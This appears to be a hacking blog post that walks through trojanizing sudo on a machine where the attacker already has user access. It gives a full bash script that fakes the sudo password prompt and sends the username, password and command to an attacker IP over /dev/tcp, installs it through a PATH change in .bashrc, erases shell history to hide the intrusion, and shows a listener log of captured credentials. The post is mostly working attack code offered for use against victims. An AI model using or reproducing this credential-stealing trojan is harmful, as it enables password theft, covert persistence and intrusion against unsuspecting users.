This page looks best with JavaScript enabled

Trojanizing sudo

 ·  🎃 kr0m

Sometimes we will gain access to a computer with a regular user but we don’t know the associated password. An easy and simple way to obtain said password is to replace sudo with our own script that will ask for the password, send it to a remote computer, and then execute the command using the original sudo binary.

With a bit of luck, that password will be reused in some other service, gaining access to it.

The idea is to generate a script called sudo that will pass itself off as the original sudo:

mkdir -p ~/.config/sudo
rm ~/.config/sudo/sudo 2>/dev/null

We generate the script, to be able to enter tabs using cat we have to use a little trick:

TAB="$(printf '\t')"

cat <<EOF > ~/.config/sudo/sudo
#!/bin/bash

IP=192.168.20.114
PORT=8000
USER=\$(whoami)

/usr/bin/sudo -n true 2> /dev/null
# Si hace sudo directamente sin pass:
if [ \$? -eq 0 ]; then
${TAB}(echo "\$USER:\$@:sinpass" > /dev/tcp/\$IP/\$PORT) > /dev/null 2>&1
${TAB}/usr/bin/sudo \$@
# Si necesita password:
else
${TAB}echo -n "[sudo] password for \$USER:"
${TAB}read -s pwd
${TAB}echo "\$pwd" | /usr/bin/sudo -S true 2>/dev/null
${TAB}if [ \$? -eq 1 ]; then
${TAB}${TAB}(echo "\$USER:\$pwd:\$@:invalid" > /dev/tcp/\$IP/\$PORT) > /dev/null 2>&1
${TAB}${TAB}echo -e "\nSorry, try again."
${TAB}${TAB}~/.config/sudo/sudo \$@
${TAB}else
${TAB}${TAB}(echo "\$USER:\$pwd:\$@:valid" > /dev/tcp/\$IP/\$PORT) > /dev/null 2>&1
${TAB}${TAB}echo "\$pwd" | /usr/bin/sudo -S \$@
${TAB}fi
fi
EOF

NOTE: The script assumes that bash was compiled with support for making tcp connections.

We assign execution permissions to the script and add the directory where the script is located to the path:

chmod u+x /.config/sudo/sudo
echo "export PATH=/.config/sudo:$PATH" >> /.bash_profile
echo "export PATH=/.config/sudo:$PATH" >> ~/.bashrc

We erase our tracks:

history -c
rm .bash_history

We start a web server where we will see the information sent by our script:

mkdir asd
cd asd
python -m SimpleHTTPServer

When the victim runs our script, they will believe they are running the original sudo binary and we will receive:

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.20.114 - - [29/Aug/2018 14:30:10] code 400, message Bad request syntax ('kr0m:AAAA:/bin/ls:invalid')
192.168.20.114 - - [29/Aug/2018 14:30:10] "kr0m:AAAA:/bin/ls:invalid" 400 -
192.168.20.114 - - [29/Aug/2018 14:30:14] code 400, message Bad request syntax ('kr0m:XXXX:/bin/ls:valid')
192.168.20.114 - - [29/Aug/2018 14:30:14] "kr0m:XXXX:/bin/ls:valid" 400 -
192.168.20.114 - - [29/Aug/2018 14:30:18] code 400, message Bad request syntax ('kr0m:/bin/ls:sinpass')
192.168.20.114 - - [29/Aug/2018 14:30:18] "kr0m:/bin/ls:sinpass" 400 -
If you liked the article, you can treat me to a RedBull here